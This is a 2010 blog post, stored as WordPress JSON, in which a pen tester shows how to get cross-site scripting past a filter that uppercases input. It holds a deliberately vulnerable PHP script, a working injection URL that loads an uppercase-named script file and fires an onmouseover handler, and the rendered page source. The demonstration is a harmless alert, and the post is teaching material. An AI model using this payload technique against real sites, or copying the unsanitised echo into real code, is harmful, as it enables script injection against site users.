{"id":32,"date":"2010-05-28T03:31:00","date_gmt":"2010-05-28T03:31:00","guid":{"rendered":"https:\/\/freezion.com\/?p=32"},"modified":"2010-05-28T03:31:00","modified_gmt":"2010-05-28T03:31:00","slug":"thinking-sideways","status":"publish","type":"post","link":"https:\/\/freezion.com\/?p=32","title":{"rendered":"thinking sideways"},"content":{"rendered":"

Had an interesting question posed to me today. A web application was using portions of the GET request to create content on a page, and not properly sanitising the input. The result was a web page that was potentially vulnerable to cross-site scripting (XSS). However, there was a catch. The application, while not checking for security risks, was converting the GET request parameters to all uppercase.<\/p>\n

This meant that, since javascript is case sensitive, the usual methods wouldn’t work For example you couldn’t use document.write(), or alert(), because they were rendered as DOCUMENT.WRITE() or ALERT() instead.<\/p>\n

Here’s a quick and dirty PHP script I wrote that mimics this behaviour (note that you will need to have GPC_MAGIC_QUOTES turned off in the php.ini for this to work)<\/p>\n

<?php\n   echo '<form name=\"testform\" method=\"post\">';\n   echo '<select name=\"test\">';\n   if (isset($_GET['options']) ) {\n      echo strtoupper($_GET['options']);\n   } else {\n      echo '<option value=\"empty\">EMPTY<\/option>';\n   }\n   echo '<\/select>';\n   echo '<input type=\"submit\" name=\"submit\" value=\"submit\" \/>';\n   echo '<\/form>';\n?><\/pre>\n
To test it out, simply browse to http:\/\/yourhost.yourdomain\/test.php?options=uppercaseftw<\/p>\n
So, the question as a pen tester is, how can I break this?<\/p>\n
Turns out the answer is pretty simple: you simply make your own javascript file, host it on a server somewhere, give it an uppercase file name, and create functions with uppercase names.<\/p>\n
For example, I created the following XSS() function, in a file named XSS.JS:<\/p>\n
function XSS() {\n   alert('xss'); \/\/ or whatever\n}<\/pre>\n
Now, I need to load this code into the page I’m requesting, and then somehow call the XSS() function. I did this by closing the select tag in my options<\/em> GET parameter, and providing my own script tag. I then created a link to “foo”, and set an onMouseOver event to call the XSS() function.<\/p>\n
Here’s what the request URL looks like to exploit this code:<\/p>\n
http:\/\/localhost\/sandbox\/index.php?options=<option value=\"number1\">number1<\/option><\/select><script language=\"javascript\" src=\"XSS.JS\"><\/script><a href=\"foo\" onmouseover=\"XSS()\">clicky<\/a>   <!--<\/pre>\n
The result is a nice link that, upon placing the mouse over it, triggers the javascript event which fires off the usual alert box.<\/p>\n
The source code of the resulting page looks like this:<\/p>\n
<form name=\"testform\" method=\"post\">\n<select name=\"test\">\n<OPTION VALUE=\"NUMBER1\">NUMBER1<\/OPTION>\n<\/SELECT>\n<SCRIPT LANGUAGE=\"JAVASCRIPT\" SRC=\"XSS.JS\"><\/SCRIPT>\n<A HREF=\"FOO\" ONMOUSEOVER=\"XSS()\">CLICKY<\/A>\n<!--<\/select>\n<input type=\"submit\" name=\"submit\" value=\"submit\" \/>\n<\/form><\/pre>\n
Nothing particularly awesome about this, but it was a situation I’d not come across before, and it took me a minute to figure out a way around it. So I thought I’d share =)<\/p>\n","protected":false},"excerpt":{"rendered":"
Had an interesting question posed to me today. A web application was using portions of the GET request to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,4],"tags":[20,46],"class_list":["post-32","post","type-post","status-publish","format-standard","hentry","category-hacking","category-musing","tag-hacker","tag-rambling"],"_links":{"self":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts\/32","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32"}],"version-history":[{"count":0,"href":"https:\/\/freezion.com\/index.php?rest_route=\/wp\/v2\/posts\/32\/revisions"}],"wp:attachment":[{"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/freezion.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}